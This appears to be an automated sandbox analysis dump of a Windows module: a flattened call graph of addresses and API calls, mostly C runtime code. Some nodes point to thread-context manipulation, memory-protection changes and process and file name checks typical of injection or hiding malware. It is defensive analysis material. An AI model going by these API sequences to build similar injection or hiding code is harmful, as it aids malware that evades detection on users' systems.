1f5a968b1e9 Is_bad_exception_allowed 8715->8717 8716->8684 8717->8716 8718 1f5a96898cc 9 API calls Is_bad_exception_allowed 8717->8718 8718->8717 8720 1f5a968a899 8719->8720 8732 1f5a968a928 8719->8732 8721 1f5a96898cc Is_bad_exception_allowed 9 API calls 8720->8721 8722 1f5a968a8a2 8721->8722 8723 1f5a96898cc Is_bad_exception_allowed 9 API calls 8722->8723 8724 1f5a968a8bb 8722->8724 8722->8732 8723->8724 8725 1f5a968a8e7 8724->8725 8726 1f5a96898cc Is_bad_exception_allowed 9 API calls 8724->8726 8724->8732 8727 1f5a96898e0 9 API calls 8725->8727 8726->8725 8728 1f5a968a8fb 8727->8728 8729 1f5a968a914 8728->8729 8730 1f5a96898cc Is_bad_exception_allowed 9 API calls 8728->8730 8728->8732 8731 1f5a96898e0 9 API calls 8729->8731 8730->8729 8731->8732 8732->8660 8734 1f5a9689534 __SetUnwindTryBlock RtlLookupFunctionEntry 8733->8734 8735 1f5a968a095 8734->8735 8736 1f5a96898cc Is_bad_exception_allowed 9 API calls 8735->8736 8737 1f5a968a0cd 8736->8737 8738 1f5a9689738 9 API calls 8737->8738 8739 1f5a968a111 8738->8739 8739->8660 8741 1f5a96894b8 __FrameHandler3::ExecutionInCatch 8740->8741 8742 1f5a9689440 __FrameHandler3::ExecutionInCatch 9 API calls 8741->8742 8743 1f5a96894c2 8742->8743 8743->8649 8745 1f5a9687e40 _log10_special 8 API calls 8744->8745 8746 1f5a9689832 8745->8746 8746->8634 8748 1f5a968a635 8747->8748 8752 1f5a968a848 8747->8752 8749 1f5a9689224 _CallSETranslator 9 API calls 8748->8749 8750 1f5a968a63a 8749->8750 8751 1f5a968a659 EncodePointer 8750->8751 8758 1f5a968a6ac 8750->8758 8753 1f5a9689224 _CallSETranslator 9 API calls 8751->8753 8752->8634 8754 1f5a968a669 8753->8754 8754->8758 8765 1f5a96893ec 8754->8765 8756 1f5a96898cc 9 API calls Is_bad_exception_allowed 8756->8758 8757 1f5a968a058 19 API calls 8757->8758 8758->8752 8758->8756 8758->8757 8760 1f5a9689534 __SetUnwindTryBlock RtlLookupFunctionEntry 8759->8760 8761 1f5a9689cc7 8760->8761 8761->8700 8761->8701 8763 1f5a9689534 __SetUnwindTryBlock RtlLookupFunctionEntry 8762->8763 8764 1f5a9689d06 8763->8764 8764->8704 8766 1f5a9689224 _CallSETranslator 9 API calls 8765->8766 8767 1f5a9689418 8766->8767 8767->8758 8768 1f5a9694580 8769 1f5a96945b8 __GSHandlerCheckCommon 8768->8769 8770 1f5a96945e4 8769->8770 8772 1f5a9689924 8769->8772 8773 1f5a9689224 _CallSETranslator 9 API calls 8772->8773 8774 1f5a968994e 8773->8774 8775 1f5a9689224 _CallSETranslator 9 API calls 8774->8775 8776 1f5a968995b 8775->8776 8777 1f5a9689224 _CallSETranslator 9 API calls 8776->8777 8778 1f5a9689964 8777->8778 8778->8770 9089 1f5a9694600 9099 1f5a9688ba0 9089->9099 9091 1f5a9694628 9093 1f5a9689224 _CallSETranslator 9 API calls 9094 1f5a9694638 9093->9094 9095 1f5a9689224 _CallSETranslator 9 API calls 9094->9095 9096 1f5a9694641 9095->9096 9097 1f5a968c248 23 API calls 9096->9097 9098 1f5a969464a 9097->9098 9100 1f5a9688bd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9099->9100 9101 1f5a9688cd1 9100->9101 9102 1f5a9688c94 RtlUnwindEx 9100->9102 9101->9091 9101->9093 9102->9100 9103 1f5a9686200 9104 1f5a968620d 9103->9104 9105 1f5a9686219 9104->9105 9110 1f5a968632a 9104->9110 9106 1f5a968629d 9105->9106 9107 1f5a9686276 SetThreadContext 9105->9107 9107->9106 9108 1f5a968640e 9111 1f5a968642e 9108->9111 9113 1f5a96848f0 VirtualFree 9108->9113 9109 1f5a9686351 VirtualProtect FlushInstructionCache 9109->9110 9110->9108 9110->9109 9112 1f5a9685300 3 API calls 9111->9112 9116 1f5a9686433 9112->9116 9113->9111 9114 1f5a9686487 9117 1f5a9687e40 _log10_special 8 API calls 9114->9117 9115 1f5a9686447 ResumeThread 9115->9116 9116->9114 9116->9115 9118 1f5a96864cf 9117->9118 8779 1f5a9695181 __scrt_dllmain_exception_filter 9119 1f5a968c804 9120 1f5a968c81e 9119->9120 9121 1f5a968c809 9119->9121 9125 1f5a968c824 9121->9125 9126 1f5a968c86e 9125->9126 9127 1f5a968c866 9125->9127 9129 1f5a968d2e4 __free_lconv_mon 11 API calls 9126->9129 9128 1f5a968d2e4 __free_lconv_mon 11 API calls 9127->9128 9128->9126 9130 1f5a968c87b 9129->9130 9131 1f5a968d2e4 __free_lconv_mon 11 API calls 9130->9131 9132 1f5a968c888 9131->9132 9133 1f5a968d2e4 __free_lconv_mon 11 API calls 9132->9133 9134 1f5a968c895 9133->9134 9135 1f5a968d2e4 __free_lconv_mon 11 API calls 9134->9135 9136 1f5a968c8a2 9135->9136 9137 1f5a968d2e4 __free_lconv_mon 11 API calls 9136->9137 9138 1f5a968c8af 9137->9138 9139 1f5a968d2e4 __free_lconv_mon 11 API calls 9138->9139 9140 1f5a968c8bc 9139->9140 9141 1f5a968d2e4 __free_lconv_mon 11 API calls 9140->9141 9142 1f5a968c8c9 9141->9142 9143 1f5a968d2e4 __free_lconv_mon 11 API calls 9142->9143 9144 1f5a968c8d9 9143->9144 9145 1f5a968d2e4 __free_lconv_mon 11 API calls 9144->9145 9146 1f5a968c8e9 9145->9146 9151 1f5a968c6d4 9146->9151 9165 1f5a968c53c EnterCriticalSection 9151->9165 7897 1f5a968bc84 7898 1f5a968bc9d 7897->7898 7899 1f5a968bc99 7897->7899 7912 1f5a968e830 7898->7912 7904 1f5a968bcaf 7906 1f5a968d2e4 __free_lconv_mon 11 API calls 7904->7906 7905 1f5a968bcbb 7938 1f5a968bcf8 7905->7938 7906->7899 7909 1f5a968d2e4 __free_lconv_mon 11 API calls 7910 1f5a968bce2 7909->7910 7911 1f5a968d2e4 __free_lconv_mon 11 API calls 7910->7911 7911->7899 7913 1f5a968e83d 7912->7913 7914 1f5a968bca2 7912->7914 7957 1f5a968ca9c 7913->7957 7918 1f5a968ed8c GetEnvironmentStringsW 7914->7918 7916 1f5a968e86c 7974 1f5a968e508 7916->7974 7919 1f5a968bca7 7918->7919 7920 1f5a968edbc 7918->7920 7919->7904 7919->7905 7921 1f5a968ecac WideCharToMultiByte 7920->7921 7922 1f5a968ee0d 7921->7922 7923 1f5a968ee14 FreeEnvironmentStringsW 7922->7923 7924 1f5a968c5ac 12 API calls 7922->7924 7923->7919 7925 1f5a968ee27 7924->7925 7926 1f5a968ee2f 7925->7926 7927 1f5a968ee38 7925->7927 7928 1f5a968d2e4 __free_lconv_mon 11 API calls 7926->7928 7929 1f5a968ecac WideCharToMultiByte 7927->7929 7930 1f5a968ee36 7928->7930 7931 1f5a968ee5b 7929->7931 7930->7923 7932 1f5a968ee5f 7931->7932 7933 1f5a968ee69 7931->7933 7934 1f5a968d2e4 __free_lconv_mon 11 API calls 7932->7934 7935 1f5a968d2e4 __free_lconv_mon 11 API calls 7933->7935 7936 1f5a968ee67 FreeEnvironmentStringsW 7934->7936 7935->7936 7936->7919 7939 1f5a968bd1d 7938->7939 7940 1f5a968d26c __free_lconv_mon 11 API calls 7939->7940 7952 1f5a968bd53 7940->7952 7941 1f5a968bd5b 7942 1f5a968d2e4 __free_lconv_mon 11 API calls 7941->7942 7943 1f5a968bcc3 7942->7943 7943->7909 7944 1f5a968bdce 7945 1f5a968d2e4 __free_lconv_mon 11 API calls 7944->7945 7945->7943 7946 1f5a968d26c __free_lconv_mon 11 API calls 7946->7952 7947 1f5a968bdbd 7949 1f5a968be08 11 API calls 7947->7949 7948 1f5a968c288 __std_exception_copy 49 API calls 7948->7952 7950 1f5a968bdc5 7949->7950 7953 1f5a968d2e4 __free_lconv_mon 11 API calls 7950->7953 7951 1f5a968bdf3 7955 1f5a968d130 _invalid_parameter_noinfo 17 API calls 7951->7955 7952->7941 7952->7944 7952->7946 7952->7947 7952->7948 7952->7951 7954 1f5a968d2e4 __free_lconv_mon 11 API calls 7952->7954 7953->7941 7954->7952 7956 1f5a968be06 7955->7956 7958 1f5a968caad FlsGetValue 7957->7958 7959 1f5a968cac8 FlsSetValue 7957->7959 7961 1f5a968cac2 7958->7961 7963 1f5a968caba 7958->7963 7960 1f5a968cad5 7959->7960 7959->7963 7962 1f5a968d26c __free_lconv_mon 11 API calls 7960->7962 7961->7959 7964 1f5a968cae4 7962->7964 7963->7916 7965 1f5a968cb02 FlsSetValue 7964->7965 7966 1f5a968caf2 FlsSetValue 7964->7966 7967 1f5a968cb0e FlsSetValue 7965->7967 7968 1f5a968cb20 7965->7968 7969 1f5a968cafb 7966->7969 7967->7969 7970 1f5a968c734 __free_lconv_mon 11 API calls 7968->7970 7971 1f5a968d2e4 __free_lconv_mon 11 API calls 7969->7971 7972 1f5a968cb28 7970->7972 7971->7963 7972->7963 7973 1f5a968d2e4 __free_lconv_mon 11 API calls 7972->7973 7973->7963 7997 1f5a968e778 7974->7997 7979 1f5a968c5ac 12 API calls 7980 1f5a968e56b 7979->7980 7981 1f5a968e573 7980->7981 7984 1f5a968e582 7980->7984 7982 1f5a968d2e4 __free_lconv_mon 11 API calls 7981->7982 7983 1f5a968e55a 7982->7983 7983->7914 7984->7984 8016 1f5a968e8ac 7984->8016 7987 1f5a968e67e 7988 1f5a968d24c __free_lconv_mon 11 API calls 7987->7988 7990 1f5a968e683 7988->7990 7989 1f5a968e6d9 7993 1f5a968e740 7989->7993 8027 1f5a968e038 7989->8027 7991 1f5a968d2e4 __free_lconv_mon 11 API calls 7990->7991 7991->7983 7992 1f5a968e698 7992->7989 7994 1f5a968d2e4 __free_lconv_mon 11 API calls 7992->7994 7996 1f5a968d2e4 __free_lconv_mon 11 API calls 7993->7996 7994->7989 7996->7983 7998 1f5a968e79b 7997->7998 8003 1f5a968e7a5 7998->8003 8042 1f5a968c53c EnterCriticalSection 7998->8042 8004 1f5a968e53d 8003->8004 8006 1f5a968ca9c 16 API calls 8003->8006 8009 1f5a968e208 8004->8009 8007 1f5a968e86c 8006->8007 8008 1f5a968e508 69 API calls 8007->8008 8008->8004 8043 1f5a968dd54 8009->8043 8012 1f5a968e228 GetOEMCP 8014 1f5a968e24f 8012->8014 8013 1f5a968e23a 8013->8014 8015 1f5a968e23f GetACP 8013->8015 8014->7979 8014->7983 8015->8014 8017 1f5a968e208 25 API calls 8016->8017 8018 1f5a968e8d9 8017->8018 8019 1f5a968ea2f 8018->8019 8020 1f5a968e916 IsValidCodePage 8018->8020 8026 1f5a968e930 8018->8026 8021 1f5a9687e40 _log10_special 8 API calls 8019->8021 8020->8019 8023 1f5a968e927 8020->8023 8022 1f5a968e675 8021->8022 8022->7987 8022->7992 8024 1f5a968e956 GetCPInfo 8023->8024 8023->8026 8024->8019 8024->8026 8059 1f5a968e320 8026->8059 8145 1f5a968c53c EnterCriticalSection 8027->8145 8044 1f5a968dd73 8043->8044 8045 1f5a968dd78 8043->8045 8044->8012 8044->8013 8045->8044 8046 1f5a968c9c8 _invalid_parameter_noinfo 23 API calls 8045->8046 8047 1f5a968dd93 8046->8047 8051 1f5a968ff9c 8047->8051 8052 1f5a968ffb1 8051->8052 8053 1f5a968ddb6 8051->8053 8052->8053 8054 1f5a96905fc _invalid_parameter_noinfo 23 API calls 8052->8054 8055 1f5a9690008 8053->8055 8054->8053 8056 1f5a969001d 8055->8056 8057 1f5a9690030 8055->8057 8056->8057 8058 1f5a968e890 _invalid_parameter_noinfo 23 API calls 8056->8058 8057->8044 8058->8057 8060 1f5a968e35d GetCPInfo 8059->8060 8061 1f5a968e453 8059->8061 8060->8061 8066 1f5a968e370 8060->8066 8062 1f5a9687e40 _log10_special 8 API calls 8061->8062 8064 1f5a968e4f2 8062->8064 8064->8019 8070 1f5a96910e4 8066->8070 8071 1f5a968dd54 23 API calls 8070->8071 8072 1f5a9691126 8071->8072 8090 1f5a968ec1c 8072->8090 8092 1f5a968ec25 MultiByteToWideChar 8090->8092 8780 1f5a9683184 8781 1f5a96831ab 8780->8781 8782 1f5a9683278 8781->8782 8783 1f5a96831c8 PdhGetCounterInfoW 8781->8783 8783->8782 8784 1f5a96831ea GetProcessHeap HeapAlloc PdhGetCounterInfoW 8783->8784 8785 1f5a9683264 GetProcessHeap HeapFree 8784->8785 8786 1f5a968321c StrCmpW 8784->8786 8785->8782 8786->8785 8788 1f5a9683231 8786->8788 8787 1f5a968372c 12 API calls 8787->8788 8788->8785 8788->8787 8789 1f5a9682b78 8791 1f5a9682bbe 8789->8791 8790 1f5a9682c20 8791->8790 8792 1f5a9683d58 StrCmpNIW 8791->8792 8792->8791 8419 1f5a96824fc 8420 1f5a9682587 8419->8420 8421 1f5a96825e9 GetFileType 8420->8421 8433 1f5a96826b7 8420->8433 8422 1f5a968260d 8421->8422 8423 1f5a96825f7 StrCpyW 8421->8423 8435 1f5a9681ad0 GetFinalPathNameByHandleW 8422->8435 8424 1f5a968261c 8423->8424 8429 1f5a96826bc 8424->8429 8430 1f5a9682625 8424->8430 8426 1f5a9683d58 StrCmpNIW 8426->8429 8427 1f5a9683d58 StrCmpNIW 8427->8430 8428 1f5a96834e4 4 API calls 8428->8429 8429->8426 8429->8428 8431 1f5a9681dd0 2 API calls 8429->8431 8429->8433 8430->8427 8430->8433 8440 1f5a96834e4 StrCmpIW 8430->8440 8444 1f5a9681dd0 8430->8444 8431->8429 8436 1f5a9681b39 8435->8436 8437 1f5a9681afa StrCmpNIW 8435->8437 8436->8424 8437->8436 8438 1f5a9681b14 lstrlenW 8437->8438 8438->8436 8439 1f5a9681b26 StrCpyW 8438->8439 8439->8436 8441 1f5a968352d PathCombineW 8440->8441 8442 1f5a9683516 StrCpyW StrCatW 8440->8442 8443 1f5a9683536 8441->8443 8442->8443 8443->8430 8445 1f5a9681de7 8444->8445 8446 1f5a9681df0 8444->8446 8447 1f5a9681530 2 API calls 8445->8447 8446->8430 8447->8446 8451 1f5a969530d 8454 1f5a968ae34 8451->8454 8455 1f5a968ae9b 8454->8455 8456 1f5a968ae4e 8454->8456 8456->8455 8457 1f5a9689224 _CallSETranslator 9 API calls 8456->8457 8457->8455 8793 1f5a968f790 8796 1f5a968f748 8793->8796 8801 1f5a968c53c EnterCriticalSection 8796->8801 8802 1f5a9687f90 8803 1f5a9687f99 __scrt_acquire_startup_lock 8802->8803 8805 1f5a9687f9d 8803->8805 8806 1f5a968bafc 8803->8806 8807 1f5a968bb33 8806->8807 8808 1f5a968bb1c 8806->8808 8807->8805 8809 1f5a968bb24 8808->8809 8810 1f5a968bb3a 8808->8810 8811 1f5a968d24c __free_lconv_mon 11 API calls 8809->8811 8812 1f5a968e830 69 API calls 8810->8812 8814 1f5a968bb29 8811->8814 8813 1f5a968bb3f 8812->8813 8837 1f5a968df14 GetModuleFileNameW 8813->8837 8816 1f5a968d110 _invalid_parameter_noinfo 49 API calls 8814->8816 8816->8807 8822 1f5a968bbb1 8825 1f5a968d24c __free_lconv_mon 11 API calls 8822->8825 8823 1f5a968bbc9 8824 1f5a968b8d4 23 API calls 8823->8824 8830 1f5a968bbe5 8824->8830 8826 1f5a968bbb6 8825->8826 8828 1f5a968d2e4 __free_lconv_mon 11 API calls 8826->8828 8827 1f5a968bbeb 8829 1f5a968d2e4 __free_lconv_mon 11 API calls 8827->8829 8828->8807 8829->8807 8830->8827 8831 1f5a968bc30 8830->8831 8832 1f5a968bc17 8830->8832 8835 1f5a968d2e4 __free_lconv_mon 11 API calls 8831->8835 8833 1f5a968d2e4 __free_lconv_mon 11 API calls 8832->8833 8834 1f5a968bc20 8833->8834 8836 1f5a968d2e4 __free_lconv_mon 11 API calls 8834->8836 8835->8827 8836->8807 8838 1f5a968df6d 8837->8838 8839 1f5a968df59 GetLastError 8837->8839 8841 1f5a968dd54 23 API calls 8838->8841 8861 1f5a968d1c0 8839->8861 8842 1f5a968df9b 8841->8842 8848 1f5a968dfac 8842->8848 8866 1f5a968f148 8842->8866 8844 1f5a9687e40 _log10_special 8 API calls 8846 1f5a968bb56 8844->8846 8849 1f5a968b8d4 8846->8849 8847 1f5a968df66 8847->8844 8869 1f5a968ddf8 8848->8869 8851 1f5a968b912 8849->8851 8853 1f5a968b97e 8851->8853 8883 1f5a968ebe0 8851->8883 8852 1f5a968ba6f 8855 1f5a968ba9c 8852->8855 8853->8852 8854 1f5a968ebe0 23 API calls 8853->8854 8854->8853 8856 1f5a968baec 8855->8856 8857 1f5a968bab4 8855->8857 8856->8822 8856->8823 8857->8856 8858 1f5a968d26c __free_lconv_mon 11 API calls 8857->8858 8859 1f5a968bae2 8858->8859 8860 1f5a968d2e4 __free_lconv_mon 11 API calls 8859->8860 8860->8856 8862 1f5a968cb40 __free_lconv_mon 11 API calls 8861->8862 8863 1f5a968d1cd __free_lconv_mon 8862->8863 8864 1f5a968cb40 __free_lconv_mon 11 API calls 8863->8864 8865 1f5a968d1ef 8864->8865 8865->8847 8867 1f5a968ef34 5 API calls 8866->8867 8868 1f5a968f168 8867->8868 8868->8848 8870 1f5a968de37 8869->8870 8871 1f5a968de1c 8869->8871 8872 1f5a968de3c 8870->8872 8873 1f5a968ecac WideCharToMultiByte 8870->8873 8871->8847 8872->8871 8875 1f5a968d24c __free_lconv_mon 11 API calls 8872->8875 8874 1f5a968de93 8873->8874 8874->8872 8876 1f5a968de9a GetLastError 8874->8876 8878 1f5a968dec5 8874->8878 8875->8871 8877 1f5a968d1c0 11 API calls 8876->8877 8880 1f5a968dea7 8877->8880 8879 1f5a968ecac WideCharToMultiByte 8878->8879 8881 1f5a968deec 8879->8881 8882 1f5a968d24c __free_lconv_mon 11 API calls 8880->8882 8881->8871 8881->8876 8882->8871 8884 1f5a968eb6c 8883->8884 8885 1f5a968dd54 23 API calls 8884->8885 8886 1f5a968eb90 8885->8886 8886->8851 8458 1f5a968b711 8470 1f5a968c248 8458->8470 8471 1f5a968c9c8 _invalid_parameter_noinfo 23 API calls 8470->8471 8472 1f5a968c251 8471->8472 8157 1f5a9683294 8158 1f5a96832c4 8157->8158 8159 1f5a968337d 8158->8159 8160 1f5a96832e1 PdhGetCounterInfoW 8158->8160 8160->8159 8161 1f5a96832ff GetProcessHeap HeapAlloc PdhGetCounterInfoW 8160->8161 8162 1f5a9683331 StrCmpW 8161->8162 8163 1f5a9683369 GetProcessHeap HeapFree 8161->8163 8162->8163 8164 1f5a9683346 8162->8164 8163->8159 8164->8163 8166 1f5a968372c StrCmpNW 8164->8166 8167 1f5a96837ce 8166->8167 8168 1f5a968375e StrStrW 8166->8168 8167->8164 8168->8167 8169 1f5a9683777 StrToIntW 8168->8169 8169->8167 8170 1f5a968379f 8169->8170 8170->8167 8176 1f5a9681a30 OpenProcess 8170->8176 8173 1f5a9683d58 StrCmpNIW 8174 1f5a96837c0 8173->8174 8174->8167 8182 1f5a9681cf8 8174->8182 8177 1f5a9681ab4 8176->8177 8178 1f5a9681a64 K32GetProcessImageFileNameW 8176->8178 8177->8167 8177->8173 8179 1f5a9681aab CloseHandle 8178->8179 8180 1f5a9681a7c PathFindFileNameW lstrlenW 8178->8180 8179->8177 8180->8179 8181 1f5a9681a9a StrCpyW 8180->8181 8181->8179 8183 1f5a9681d0f 8182->8183 8184 1f5a9681d18 8182->8184 8185 1f5a9681530 2 API calls 8183->8185 8184->8167 8185->8184 9167 1f5a9682214 9168 1f5a9682245 9167->9168 9169 1f5a9682360 9168->9169 9170 1f5a9682268 9168->9170 9176 1f5a968232b 9168->9176 9171 1f5a96823da 9169->9171 9172 1f5a968236b 9169->9172 9175 1f5a96822a6 StrCmpNIW 9170->9175 9170->9176 9178 1f5a9681d2c 9170->9178 9174 1f5a96833a4 11 API calls 9171->9174 9171->9176 9184 1f5a96833a4 GetProcessHeap HeapAlloc 9172->9184 9174->9176 9175->9170 9179 1f5a9681db0 9178->9179 9180 1f5a9681d53 GetProcessHeap HeapAlloc 9178->9180 9179->9170 9180->9179 9181 1f5a9681d8e 9180->9181 9182 1f5a9681cf8 2 API calls 9181->9182 9183 1f5a9681d96 GetProcessHeap HeapFree 9182->9183 9183->9179 9189 1f5a96833f7 9184->9189 9185 1f5a96834b5 GetProcessHeap HeapFree 9185->9176 9186 1f5a96834b0 9186->9185 9187 1f5a9683442 StrCmpNIW 9187->9189 9188 1f5a9681d2c 6 API calls 9188->9189 9189->9185 9189->9186 9189->9187 9189->9188 9190 1f5a968fe08 9191 1f5a968fe32 9190->9191 9192 1f5a968d26c __free_lconv_mon 11 API calls 9191->9192 9193 1f5a968fe51 9192->9193 9194 1f5a968d2e4 __free_lconv_mon 11 API calls 9193->9194 9195 1f5a968fe5f 9194->9195 9196 1f5a968d26c __free_lconv_mon 11 API calls 9195->9196 9199 1f5a968fe89 9195->9199 9198 1f5a968fe7b 9196->9198 9197 1f5a968f1ac 6 API calls 9197->9199 9200 1f5a968d2e4 __free_lconv_mon 11 API calls 9198->9200 9199->9197 9201 1f5a968fe92 9199->9201 9200->9199 8887 1f5a968f38c 8888 1f5a968f396 8887->8888 8889 1f5a968f3c5 8887->8889 8888->8889 8890 1f5a968f3ab FreeLibrary 8888->8890 8890->8888 9202 1f5a9688e0c 9209 1f5a968936c 9202->9209 9207 1f5a9688e19 9210 1f5a9689374 9209->9210 9212 1f5a96893a5 9210->9212 9213 1f5a9688e15 9210->9213 9226 1f5a9689c28 9210->9226 9214 1f5a96893b4 __vcrt_uninitialize_locks DeleteCriticalSection 9212->9214 9213->9207 9215 1f5a9689300 9213->9215 9214->9213 9231 1f5a9689afc 9215->9231 9227 1f5a96899ac __vcrt_InitializeCriticalSectionEx 5 API calls 9226->9227 9228 1f5a9689c5e 9227->9228 9229 1f5a9689c73 InitializeCriticalSectionAndSpinCount 9228->9229 9230 1f5a9689c68 9228->9230 9229->9230 9230->9210 9232 1f5a96899ac __vcrt_InitializeCriticalSectionEx 5 API calls 9231->9232 9233 1f5a9689b21 TlsAlloc 9232->9233 8186 1f5a9685a5d 8188 1f5a9685a64 8186->8188 8187 1f5a9685acb 8188->8187 8189 1f5a9685b47 VirtualProtect 8188->8189 8190 1f5a9685b81 8189->8190 8191 1f5a9685b73 GetLastError 8189->8191 8191->8190 8473 1f5a96906e0 8474 1f5a969070d 8473->8474 8475 1f5a968d24c __free_lconv_mon 11 API calls 8474->8475 8480 1f5a9690722 8474->8480 8476 1f5a9690717 8475->8476 8477 1f5a968d110 _invalid_parameter_noinfo 49 API calls 8476->8477 8477->8480 8478 1f5a9687e40 _log10_special 8 API calls 8479 1f5a9690ae0 8478->8479 8480->8478 9235 1f5a968f7e0 9236 1f5a968f810 9235->9236 9239 1f5a968f837 9235->9239 9237 1f5a968cb40 __free_lconv_mon 11 API calls 9236->9237 9236->9239 9242 1f5a968f824 9236->9242 9237->9242 9238 1f5a968f90c 9243 1f5a968fa40 9238->9243 9246 1f5a968f973 9238->9246 9250 1f5a968f93a 9238->9250 9239->9238 9258 1f5a968c53c EnterCriticalSection 9239->9258 9240 1f5a968f874 9242->9239 9242->9240 9245 1f5a968f8b9 9242->9245 9244 1f5a968fa4d 9243->9244 9260 1f5a968c590 LeaveCriticalSection 9243->9260 9248 1f5a968d24c __free_lconv_mon 11 API calls 9245->9248 9256 1f5a968f9d1 9246->9256 9259 1f5a968c590 LeaveCriticalSection 9246->9259 9251 1f5a968f8be 9248->9251 9250->9246 9252 1f5a968c9c8 _invalid_parameter_noinfo 23 API calls 9250->9252 9253 1f5a968d110 _invalid_parameter_noinfo 49 API calls 9251->9253 9254 1f5a968f963 9252->9254 9253->9240 9255 1f5a968c9c8 _invalid_parameter_noinfo 23 API calls 9254->9255 9255->9246 9257 1f5a968c9c8 23 API calls _invalid_parameter_noinfo 9256->9257 9257->9256 9261 1f5a9690be0 9262 1f5a9690bff 9261->9262 9263 1f5a9690c78 9262->9263 9266 1f5a9690c0f 9262->9266 9269 1f5a96886ec 9263->9269 9267 1f5a9687e40 _log10_special 8 API calls 9266->9267 9268 1f5a9690c6e 9267->9268 9272 1f5a9688700 IsProcessorFeaturePresent 9269->9272 9273 1f5a9688717 9272->9273 9278 1f5a96887a0 RtlCaptureContext RtlLookupFunctionEntry 9273->9278 9279 1f5a96887d0 RtlVirtualUnwind 9278->9279 9280 1f5a968872b 9278->9280 9279->9280 9281 1f5a96885e4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9280->9281 9282 1f5a96827e0 9284 1f5a968285f 9282->9284 9283 1f5a9682990 9284->9283 9285 1f5a96828c1 GetFileType 9284->9285 9286 1f5a96828cf StrCpyW 9285->9286 9287 1f5a96828e5 9285->9287 9288 1f5a96828f4 9286->9288 9289 1f5a9681ad0 4 API calls 9287->9289 9292 1f5a9682995 9288->9292 9296 1f5a96828fe 9288->9296 9289->9288 9290 1f5a9683d58 StrCmpNIW 9290->9292 9291 1f5a9683d58 StrCmpNIW 9291->9296 9292->9283 9292->9290 9293 1f5a96834e4 4 API calls 9292->9293 9294 1f5a9681dd0 2 API calls 9292->9294 9293->9292 9294->9292 9295 1f5a96834e4 4 API calls 9295->9296 9296->9283 9296->9291 9296->9295 9297 1f5a9681dd0 2 API calls 9296->9297 9297->9296 9298 1f5a9687fdc 9305 1f5a9688e34 9298->9305 9301 1f5a9687fe9 9306 1f5a9689240 _CallSETranslator 9 API calls 9305->9306 9307 1f5a9687fe5 9306->9307 9307->9301 9308 1f5a968c1dc 9307->9308 9309 1f5a968cb40 __free_lconv_mon 11 API calls 9308->9309 9310 1f5a9687ff2 9309->9310 9310->9301 9311 1f5a9688e48 9310->9311 9314 1f5a96891dc 9311->9314 9313 1f5a9688e51 9313->9301 9315 1f5a96891ed 9314->9315 9319 1f5a9689202 __std_exception_destroy 9314->9319 9316 1f5a9689b8c _CallSETranslator 6 API calls 9315->9316 9317 1f5a96891f2 9316->9317 9320 1f5a9689bd4 9317->9320 9319->9313 9321 1f5a96899ac __vcrt_InitializeCriticalSectionEx 5 API calls 9320->9321 9322 1f5a9689c02 9321->9322 9323 1f5a9689c14 TlsSetValue 9322->9323 9324 1f5a9689c0c 9322->9324 9323->9324 9324->9319 9325 1f5a9682ddc 9326 1f5a9682e4d 9325->9326 9327 1f5a9683160 9326->9327 9328 1f5a9682e79 GetModuleHandleA 9326->9328 9329 1f5a9682e9d 9328->9329 9330 1f5a9682e8b GetProcAddress 9328->9330 9329->9327 9331 1f5a9682ec4 StrCmpNIW 9329->9331 9330->9329 9331->9327 9335 1f5a9682ee9 9331->9335 9332 1f5a9681a30 6 API calls 9332->9335 9333 1f5a9682ffb lstrlenW 9333->9335 9334 1f5a96830a5 lstrlenW 9334->9335 9335->9327 9335->9332 9335->9333 9335->9334 9336 1f5a9683d58 StrCmpNIW 9335->9336 9337 1f5a9681cf8 StrCmpIW StrCmpW 9335->9337 9336->9335 9337->9335 9338 1f5a968f5f0 9349 1f5a968c53c EnterCriticalSection 9338->9349 8481 1f5a96840f0 8484 1f5a968403d 8481->8484 8482 1f5a96840a7 8483 1f5a968408d VirtualQuery 8483->8482 8483->8484 8484->8482 8484->8483 8485 1f5a96840f2 GetLastError 8484->8485 8485->8484 8486 1f5a968c4f4 8487 1f5a968c4fc 8486->8487 8489 1f5a968c52d 8487->8489 8491 1f5a968c529 8487->8491 8492 1f5a968f1ac 8487->8492 8497 1f5a968c558 8489->8497 8493 1f5a968ef34 5 API calls 8492->8493 8494 1f5a968f1e2 8493->8494 8495 1f5a968f201 InitializeCriticalSectionAndSpinCount 8494->8495 8496 1f5a968f1e7 8494->8496 8495->8496 8496->8487 8498 1f5a968c583 8497->8498 8499 1f5a968c566 DeleteCriticalSection 8498->8499 8500 1f5a968c587 8498->8500 8499->8498 8500->8491 9350 1f5a968ebf4 GetCommandLineA GetCommandLineW 8192 1f5a9695265 8201 1f5a9689224 8192->8201 8194 1f5a969527d 8195 1f5a9689224 _CallSETranslator 9 API calls 8194->8195 8196 1f5a9695298 8195->8196 8197 1f5a9689224 _CallSETranslator 9 API calls 8196->8197 8198 1f5a96952ac 8197->8198 8199 1f5a9689224 _CallSETranslator 9 API calls 8198->8199 8200 1f5a96952ee 8199->8200 8204 1f5a9689240 8201->8204 8203 1f5a968922d 8203->8194 8205 1f5a968925f GetLastError 8204->8205 8206 1f5a9689258 8204->8206 8216 1f5a9689b8c 8205->8216 8206->8203 8220 1f5a96899ac 8216->8220 8221 1f5a9689a96 TlsGetValue 8220->8221 8226 1f5a96899f0 __vcrt_InitializeCriticalSectionEx 8220->8226 8222 1f5a9689a1e LoadLibraryExW 8224 1f5a9689abd 8222->8224 8225 1f5a9689a3f GetLastError 8222->8225 8223 1f5a9689add GetProcAddress 8223->8221 8224->8223 8227 1f5a9689ad4 FreeLibrary 8224->8227 8225->8226 8226->8221 8226->8222 8226->8223 8228 1f5a9689a61 LoadLibraryExW 8226->8228 8227->8223 8228->8224 8228->8226 8891 1f5a968c16c 8892 1f5a968d2e4 __free_lconv_mon 11 API calls 8891->8892 8893 1f5a968c17c 8892->8893 8894 1f5a968d2e4 __free_lconv_mon 11 API calls 8893->8894 8895 1f5a968c190 8894->8895 8896 1f5a968d2e4 __free_lconv_mon 11 API calls 8895->8896 8897 1f5a968c1a4 8896->8897 8898 1f5a968d2e4 __free_lconv_mon 11 API calls 8897->8898 8899 1f5a968c1b8 8898->8899

                                                                Executed Functions

                                                                Function 000001F5A96837F8 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32 ref: 000001F5A9683811
                                                                • PathFindFileNameW.SHLWAPI ref: 000001F5A9683820
